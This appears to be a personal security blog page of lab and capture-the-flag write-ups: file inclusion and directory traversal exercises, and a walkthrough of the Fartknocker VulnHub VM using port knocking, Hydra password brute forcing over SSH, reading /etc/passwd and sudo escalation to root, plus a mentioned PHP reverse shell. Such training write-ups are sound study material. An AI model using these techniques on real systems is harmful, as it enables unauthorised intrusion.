SSH Poisoning via LFI
ContactL3ft's Randomness
Random Gibberish from an Internet Hobo.
Friday, 22 May 2020
Saturday, 30 May 2015
Web for Pentester - File Inclusion
There are two types of File inclusion
Local and Remote
Example 1.
Below is an example of Local File Inclusion, Remote is also an option, however i will cover that in Example 2.
Example 2.
after a quick edit, it was good to go.
I used pythons inbuilt simplehttpserver hosting the script on my machine, and setup a simple netcat listener for it to connect back to.
Alas!
Remote File Include, a php-reverse-shell which connected back to my netcat listener.
I wont cover escalating, that is for another day.
For now a foothold will suffice =)
Thanks for reading.
Web for Pentester - Directory Traversal
There are 3 Examples to complete.
Viewing the Source shows these better.
Viewing the Source shows these better.
1. No real issues.
2. A different approach, as the first method didnt work.
3. This was much harder, after trying a few options, i decided to employ DotDotPwn to find it.
perl dotdotpwn.pl -m http-url -h 192.168.56.101 -u http://192.168.56.101/dirtrav/example3.php?file=TRAVERSAL -o unix -b -k root
Found!
Now to test it in a browser.
Further Reading can be found here:
Thanks for reading.
Web for Pentester VM - Pentesterlab
Web for Pentester
Pentesterlab Course
VulnHub.com link
This VM is a very nice collection of the different web vulnerabilities.
The Pre-write up bit
Note: I dont do any of this for a living, and I dont claim to be all knowing.
Any finding`s will be very brief, and sometimes incomplete.
And of course, its gonna be back to front.
I`ll decide on formatting it later on, but at the moment, i cant be bothered =)
Directory Traversal
Thursday, 16 April 2015
TopHatSec - Fartknocker VM - Hosted on Vulnhub
arp gives:
Address HWtype HWaddress Flags Mask Iface
192.168.56.102 ether 08:00:27:91:bc:58 C vboxnet0
Scan:
Nmap 6.47 scan initiated Sat Apr 11 10:48:06 2015 as: nmap -sS -A -p- -oA fartknocker 192.168.56.102
Nmap scan report for 192.168.56.101
Host is up (0.0012s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:91:BC:58 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.11 - 3.14
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 1.18 ms 192.168.56.102
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
# Nmap done at Sat Apr 11 10:48:23 2015 -- 1 IP address (1 host up) scanned in 17.77 seconds
The scan shows a webserver running
Webscan:
- Nikto v2.1.5/2.1.5
+ Target Host: 192.168.56.101
+ Target Port: 80
+ GET /: Server leaks inodes via ETags, header found with file /, fields: 0x68 0x5105a792cb1f8
+ GET /: The anti-clickjacking X-Frame-Options header is not present.
+ OPTIONS /: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ -3233: GET /icons/README: /icons/README: Apache default file found.
Not much from that.......
So i decided to visit the page with a browser
The link Wooah gives pcap1.pcap
Opening it up with Wireshark, gives allot of ICMP flying back and fourth, however lower down something is happening.
TCP Ports 7000, 8000, 9000 and 8888 are used.
I probed into this, knowing that knockd was a possibility (given there is a webserver running with no means of remote administration in place)
Given my python abilities are... basic to say the least, i knocked up a simple bash script utilising netcat
cat knock1.sh
#!/bin/bash
nc -v 192.168.56.102 7000
nc -v 192.168.56.102 8000
nc -v 192.168.56.102 9000
nc -v 192.168.56.102 8888
After a few frustrating attempts, it finally worked!
./knock1.sh
nc: connect to 192.168.56.102 port 7000 (tcp) failed: Connection refused
nc: connect to 192.168.56.102 port 8000 (tcp) failed: Connection refused
nc: connect to 192.168.56.102 port 9000 (tcp) failed: Connection refused
Connection to 192.168.56.102 8888 port [tcp/*] succeeded!
/burgerworld/
Visiting the site with a browser gives:
The link gives another pcap file, pcap2.pcap.
Wireshark shows some more ICMP and ARP traffic.
however more connections are established, to different ports
Connections to TCP 21, UDP 22, TCP 80 and 8080, then a connection was estabished to http-alt (port 8080) and data went back and fourth.
So i probed with another bash script to ports 1,3,3,7 to no avail.
I decided to go slightly more upmarket and use knock-knock.
After a bit of tweaking the script kicked in.
[-] Scanning 192.168.56.102 with Nmap, this could take a minute...go get some coffee
[-] Sending default knockd sequence to 192.168.56.102
[-] Scanning again...too soon for more coffee???
[+] 1 new port(s) opened...
(1337, 'tcp')
Writing to output file - outfile.txt
[-] Sending default knockd sequence to 192.168.56.102
[-] Scanning again...too soon for more coffee???
[+] 1 new port(s) opened...
(1337, 'tcp')
Writing to output file - outfile.txt
it showed port 1337 was now open
nc -vv 192.168.56.102 1337
Connection to 192.168.56.102 1337 port [tcp/*] succeeded!
/iamcornholio/
No Pcap file this time though, however "all about that base" was a clue
echo "T3BlbiB1cCBTU0g6IDg4ODggOTk5OSA3Nzc3IDY2NjYK" > base64_encoded.txt
base64 -d base64_encoded.txt
Open up SSH: 8888 9999 7777 6666
base64 -d base64_encoded.txt
Open up SSH: 8888 9999 7777 6666
Another knocking sequence, so i returned to my bash script method.
#!/bin/bash
nc -v 192.168.56.102 8888
nc -v 192.168.56.102 9999
nc -v 192.168.56.102 7777
nc -v 192.168.56.102 6666
nc -v 192.168.56.102 22
nc -v 192.168.56.102 8888
nc -v 192.168.56.102 9999
nc -v 192.168.56.102 7777
nc -v 192.168.56.102 6666
nc -v 192.168.56.102 22
./knock4.sh
nc: connect to 192.168.56.102 port 8888 (tcp) failed: Connection refused
nc: connect to 192.168.56.102 port 9999 (tcp) failed: Connection refused
nc: connect to 192.168.56.102 port 7777 (tcp) failed: Connection refused
nc: connect to 192.168.56.102 port 6666 (tcp) failed: Connection refused
Connection to 192.168.56.102 22 port [tcp/ssh] succeeded!
SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2
nc: connect to 192.168.56.102 port 8888 (tcp) failed: Connection refused
nc: connect to 192.168.56.102 port 9999 (tcp) failed: Connection refused
nc: connect to 192.168.56.102 port 7777 (tcp) failed: Connection refused
nc: connect to 192.168.56.102 port 6666 (tcp) failed: Connection refused
Connection to 192.168.56.102 22 port [tcp/ssh] succeeded!
SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2
Port 22 is not open, nice one!
############################################
# CONGRATS! YOU HAVE OPENED THE SSH SERVER #
# USERNAME: butthead #
# PASSWORD: nachosrule #
############################################
# CONGRATS! YOU HAVE OPENED THE SSH SERVER #
# USERNAME: butthead #
# PASSWORD: nachosrule #
############################################
However this was not to be as smooth as i initally thought..
butthead@192.168.56.102's password:
Welcome to Ubuntu 14.04.2 LTS (GNU/Linux 3.13.0-46-generic i686)
* Documentation: https://help.ubuntu.com/
Last login: Sun Apr 12 15:01:54 2015 from 192.168.56.1
You are only logging in for a split second! What do you do!
Connection to 192.168.56.102 closed.
Welcome to Ubuntu 14.04.2 LTS (GNU/Linux 3.13.0-46-generic i686)
* Documentation: https://help.ubuntu.com/
Last login: Sun Apr 12 15:01:54 2015 from 192.168.56.1
You are only logging in for a split second! What do you do!
Connection to 192.168.56.102 closed.
A little digging in the man pages of ssh i stumbled across it
NAME
ssh — OpenSSH SSH client (remote login program)
SYNOPSIS
ssh [-1246AaCfgKkMNnqsTtVvXxYy] [-b bind_address] [-c cipher_spec] [-D [bind_address:]port]
[-E log_file] [-e escape_char] [-F configfile] [-I pkcs11] [-i identity_file]
[-L [bind_address:]port:host:hostport] [-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option]
[-p port] [-Q cipher | cipher-auth | mac | kex | key] [-R [bind_address:]port:host:hostport]
[-S ctl_path] [-W host:port] [-w local_tun[:remote_tun]] [user@]hostname [command]
ssh -l butthead 192.168.56.102 /bin/bash
butthead@192.168.56.102's password:
After a few seconds waiting thinking i gave the "ls" command
ls
files.txt
nachos
id
uid=1001(butthead) gid=1001(butthead) groups=1001(butthead)
cat nachos
Great job on getting this far.
Can you login as beavis or root ?
files.txt
nachos
id
uid=1001(butthead) gid=1001(butthead) groups=1001(butthead)
cat nachos
Great job on getting this far.
Can you login as beavis or root ?
this was another hint..
cat /etc/passwd | grep beavis
beavis:x:1000:1000:beavis,,,:/home/beavis:/bin/bash
beavis:x:1000:1000:beavis,,,:/home/beavis:/bin/bash
I took a while looking through the home folder of "beavis" and not finding much, I decided to set hydra loose on the ssh service.
After no luck using conventional wordlists I used cewl to generate my own from a wikipedia page on Beavis and Butthead
[DATA] attacking service ssh on port 22
[ERROR] ssh protocol error
[ERROR] ssh protocol error
---snip-----
[ERROR] ssh protocol error
[22][ssh] host: 192.168.56.101 login: beavis password: mikejudge
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-04-12 22:08:18
[ERROR] ssh protocol error
[ERROR] ssh protocol error
---snip-----
[ERROR] ssh protocol error
[22][ssh] host: 192.168.56.101 login: beavis password: mikejudge
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-04-12 22:08:18
Hydra had found a valid password for the user "beavis"
Logging in....
beavis@192.168.56.102's password:
Welcome to Ubuntu 14.04.2 LTS (GNU/Linux 3.13.0-46-generic i686)
* Documentation: https://help.ubuntu.com/
Last login: Sun Apr 12 17:07:32 2015 from 192.168.56.1
beavis@Huhuhhhhhuhuhhh:~$
Welcome to Ubuntu 14.04.2 LTS (GNU/Linux 3.13.0-46-generic i686)
* Documentation: https://help.ubuntu.com/
Last login: Sun Apr 12 17:07:32 2015 from 192.168.56.1
beavis@Huhuhhhhhuhuhhh:~$
It was starting to go very well, time to start looking for ways to obtain root...
beavis@Huhuhhhhhuhuhhh:~$ id
uid=1000(beavis) gid=1000(beavis) groups=1000(beavis),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),110(sambashare)
uid=1000(beavis) gid=1000(beavis) groups=1000(beavis),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),110(sambashare)
beavis@Huhuhhhhhuhuhhh:~$ sudo -l
[sudo] password for beavis:
[sudo] password for beavis:
Matching Defaults entries for beavis on Huhuhhhhhuhuhhh:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User beavis may run the following commands on Huhuhhhhhuhuhhh:
(ALL : ALL) ALL
beavis@Huhuhhhhhuhuhhh:~$
A quick check of id shows beavis is : groups 27(sudo) and can commands ( ALL : ALL ) ALL
beavis@Huhuhhhhhuhuhhh:~$ sudo bash
root@Huhuhhhhhuhuhhh:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Huhuhhhhhuhuhhh:~# cd /root
root@Huhuhhhhhuhuhhh:/root# ls
SECRETZ
root@Huhuhhhhhuhuhhh:/root# more SECRETZ
You have done a great job, if you can see this, please shoot me an email
and let me know that you have beat this box!
SECRET = "LIVE LONG AND PROSPER, REST IN PEACE MR. SPOCK"
admin@top-hat-sec.com
root@Huhuhhhhhuhuhhh:/root#
root@Huhuhhhhhuhuhhh:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Huhuhhhhhuhuhhh:~# cd /root
root@Huhuhhhhhuhuhhh:/root# ls
SECRETZ
root@Huhuhhhhhuhuhhh:/root# more SECRETZ
You have done a great job, if you can see this, please shoot me an email
and let me know that you have beat this box!
SECRET = "LIVE LONG AND PROSPER, REST IN PEACE MR. SPOCK"
admin@top-hat-sec.com
root@Huhuhhhhhuhuhhh:/root#
Fin:
Thanks to everyone at Vulnhub for the guidance over the time ive been there.
Special Thanks To Tophatsec for creating this challenge.
Subscribe to:
Posts (Atom)